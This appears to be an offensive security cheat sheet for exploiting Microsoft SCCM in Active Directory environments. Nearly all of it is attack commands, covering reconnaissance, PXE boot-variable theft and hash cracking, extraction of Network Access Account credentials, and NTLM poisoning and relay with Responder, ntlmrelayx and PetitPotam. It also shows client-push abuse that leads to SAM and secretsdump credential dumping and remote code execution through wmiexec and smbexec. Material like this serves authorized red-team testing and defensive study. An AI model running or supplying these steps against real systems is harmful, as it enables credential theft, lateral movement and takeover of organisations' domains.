SCCM

System Center Configuration Manager (SCCM) exploitation.

Recon

Windows

Control Panel

Control Panel > Configuration Manager

PowerShell

([ADSISearcher]("objectClass=mSSMSManagementPoint")).FindAll() | % {$_.Properties}

Get-WmiObject -Class SMS_Authority -Namespace root\CCM

SharpSCCM

# Download latest release (https://github.com/Mayyhem/SharpSCCM/releases)

.\SharpSCCM.exe local site-info

Linux

Netexec

Find sites

nxc ldap <DC-IP> -u '<USERNAME>' -p '<PASSWORD>' -M sccm -o REC_RESOLVE=TRUE

Dump SCCM

# Local admin on DC or DA required
nxc smb <DC-IP> -u '<USERNAME>' -p '<PASSWORD>' --sccm

SCCMHunter

# Install SCCMHunter
git clone https://github.com/garrettfoster13/sccmhunter.git
cd sccmhunter
virtualenv --python=python3 .
source bin/activate
pip3 install -r requirements.txt

Find sites

python3 sccmhunter.py find -u '<USERNAME>' -p '<PASSWORD>' -d <DOMAIN-FQDN> -dc-ip <DC-IP>

Find sites using SMB

python3 sccmhunter.py smb -u '<USERNAME>' -p '<PASSWORD>' -d <DOMAIN-FQDN> -dc-ip <DC-IP>

# When LDAP signing and binding is enabled
pip3 install ldap3-bleeding-edge
python3 sccmhunter.py smb -u '<USERNAME>' -p '<PASSWORD>' -d <DOMAIN-FQDN> -dc-ip <DC-IP> -binding -ldaps

Find SCCM users and computers

python3 sccmhunter.py show -users
python3 sccmhunter.py show -computers

PXE/Operating System Deployment (OSD) exploitation

# Install PXEThief on Linux
git clone https://github.com/MWR-CyberSec/PXEThief.git
cd PXEThief
git fetch origin pull/11/head:pr-11
git checkout pr-11
python3 -m venv venv
source venv/bin/activate
python3 -m pip install -r requirements.txt 

# Install PXEThief on Windows
Install npcap: https://npcap.com/#download
Install Python3: https://www.python.org/downloads/windows/
Install TFTP Client (Windows Feature)
Clone PXEThief repository: https://github.com/The-Viper-One/PXEThief.git
cd PXEThief
pip.exe install -r requirements.txt

Unauthenticated attacks

# When DHCP is enabled
python3 pxethief.py 1

# When DHCP is disabled
python3 pxethief.py 2 <TARGET-IP>

# Now check if obtained credentials have elevated privileges

Authenticated attacks

# When DHCP is enabled
python3 pxethief.py 1

# When DHCP is disabled
python3 pxethief.py 2 <TARGET-IP>

# Copy TFTP commands from tool output
tftp -m binary <IP> -c get "\SMSTemp\<PLACEHOLDER>.boot.var
tftp -m binary <IP> -c get "\SMSTemp\<PLACEHOLDER>.boot.bcd

# Get hash from boot.var file for cracking ($sccm$aes128$)
python3 pxethief.py 5 <FILENAME.boot.var>
hashcat -m 19850 <HASH-FILENAME> <WORDLIST> --force

# Decrypt boot.var file with cracked password
python3 pxethief.py 3 <FILENAME.boot.var> <CRACKED-PASSWORD>

# Copy boot.var and boot.bcd files over to Windows and continue attack to decrypt boot.var file with cracked password
python3 pxethief.py 3 <FILENAME.boot.var> <CRACKED-PASSWORD>

Network Access Account (NAA) exploitation

Extracting NAA credentials & Collection Variables from Endpoint (Local Admin required)

Windows

# Start elevated CMD prompt
.\SharpSCCM.exe get secrets
.\SharpSCCM.exe local secrets -m wmi

Linux

# Install SystemDPAPIdump tool
wget https://raw.githubusercontent.com/fortra/impacket/755efbffc7bd54c9dcf33d7c5e04038801fd3225/examples/SystemDPAPIdump.py

python3 SystemDPAPIdump.py -sccm <DOMAIN-FQDN>/<USERNAME>:'<PASSWORD>'@<LOCAL-ADMIN-HOST-IP>

SCCMwtf (Machine Account required)

# Install SCCMwtf tool
git clone https://github.com/xpn/sccmwtf.git
cd sccmwtf
pip3 install -r requirements.txt

# Add Machine Account
addcomputer.py '<DOMAIN-FQDN>/<USERNAME>:<PASSWORD' -dc-ip <DC-IP>

# Get NAA policy
python3 sccmwtf.py <COMPUTER-HOSTNAME> <COMPUTER-HOSTNAME.FQDN> <TARGET> '<DOMAIN-FQDN>\<COMPUTER-HOSTNAME>' '<PASSWORD>'

# Decrypt NetworkAccessUsername and NetworkAccessPassword from Windows machine
git clone https://github.com/RedHeadSec/SCCM-Tools.git
cd SCCM-tools
sccm-decrypt.exe <CDATA-STRING> 

Via NTLM relay

# No domain credentials? (only for variant 1: Poisoning)
# Not local admin?
# No fake machine account? ms-DS-MachineAccountQuota = 0
# Only SMB machine account NetNTLMv2 hash is required (PetitPotam, Printer bug)

# Variant 1: Poisoning (No creds, work only if poisoning a machine account)
nano Responder.conf # (turn off smb and http)
Responder -I eth0
ntlmrelayx.py -t http://sccm2.root.local/ccm_system_windowsauth/request --sccm --sccm-device test1 --sccm-fqdn sccm2.root.local --sccm-server sccm2 --sccm-sleep 10 -smb2support

# Variant 2: Coercion PetitPotam (Required low priv creds)
ntlmrelayx.py -t http://sccm2.root.local/ccm_system_windowsauth/request --sccm --sccm-device test1 --sccm-fqdn sccm2.root.local --sccm-server sccm2 --sccm-sleep 10 -smb2support

python3 PetitPotam.py 192.168.1.101 win10-7.root.local -u low -p 'Alphatango999!' -d root.local
cat naapolicy.xml

Client Push Installation explanation

The Push account’s sole purpose is to allow the SCCM server to conveniently install
SCCM client on endpoints. (Normally SCCM client use its machine account)

Although widely used, Push accounts are not required. There are safer ways to install
SCCM client such as Group Policy, Software update base, manual install, or logon
script.

Used by the site to connect to computers and install the Configuration Manager client
software during client push deployment. If not specified, the site server uses its 
computer account.

Must be a member of the local Administrators group on target computers. 
Domain Admin rights are not required.

Multiple accounts can be specified. Configuration Manager tries each until one succeeds.

Client Push via Breaking Domain Trust exploitation

• Option 1: Uninstall the client
• Option 2: Downgrade the client version
• Option 3 (the commands below): Break the domain trust to force the SCCM Client Push
  account authentication to fallback to NTLM instead of Kerberos

Prerequisites in Client Push Installation Properties
Enable automatic site-wide client push installation should be enabled
Allow connection fallback to NTLM should be enabled

1. Login as local admin
2. Join the domain (MAQ should be allowed)

Run following commands as low privileged user
setspn -D host/<HOSTNAME> <HOSTNAME>
setspn -D host/<HOSTNAME>.<DOMAIN-FQDN> <HOSTNAME>
setspn -L <HOSTNAME>

3. Reboot the machine
4. Turn off Windows Defender firewall
5. Remove the domain local admin accounts

Run following commands as local admin user
net localgroup administrators
net localgroup administrators "<DOMAIN-FQDN>\<ACCOUNT-NAME>" /del

Run PowerShell
cd C:\Users\<USERNAME>\Desktop
powershell -ep bypass

Capture incoming NTLM hashes using Inveigh
cd C:\Users\<USERNAME>\Desktop\Inveigh-master\
..\Inveigh-master\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -MachineAccounts Y

NTLM hash can be cracked or relayed to SCCM clients.

Crack NTLM hash:
hashcat -m 5600 <NTLM-HASH-FILE> <PASSWORD-LIST> --force

Client Push triggering on demand by NTLM relay to SCCM clients

Prerequisite: SMB signing disabled on targets

On Attacker machine (Will dump SAM automatically):
impacket-ntlmrelayx -t "<TARGET>" -smb2support -of logs

On SCCM client:
SharpSCCM.exe invoke client-push -t <ATTACKER-IP> -mp <MANAGEMENT-POINT>.<DOMAIN-FQDN> -sc <SCCM-SITE-CODE>

Compromise the target machine using the local SAM hash
impacket-wmiexec ./<USERNAME>@<TARGET> -hashes :<NTLM-HASH>

Client Push account is the SCCM Server Machine Account

Prerequisites
SCCM Server Machine Account is used as the Push Account (e.g. SCCM2$)
SMB signing must be disabled on the targets

1. Check if Machine Account is local admin on the target machine
net localgroup administrators
2. Generate SMB relay list
nxc smb <IP-SUBNET> --gen-relay-list relay_list.txt
3. Relay credentials and keep proxy alive
impacket-ntlmrelayx -tf relay_list.txt -smb2support -socks
4. Relay credentials with PetitPotam from SCCM server
python3 PetitPotam.py <ATTACKER-IP> <MANAGEMENT-POINT>.<DOMAIN-FQDN> -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN-FQDN>
5. Check if connections have been established with ntlmrelayx
socks
6. Edit /etc/proxychains4.conf
socks5 127.0.0.1 1080
7. Run commands on the hosts where you have local admin
proxychains impacket-smbexec <DOMAIN-FQDN>/'<SCCM-MACHINE-ACCOUNT$>'@<TARGET-IP> -no-pass
8. Perform secretsdump
proxychains impacket-secretsdump <DOMAIN-FQDN>/'<SCCM-MACHINE-ACCOUNT$>'@<TARGET-IP> -no-pass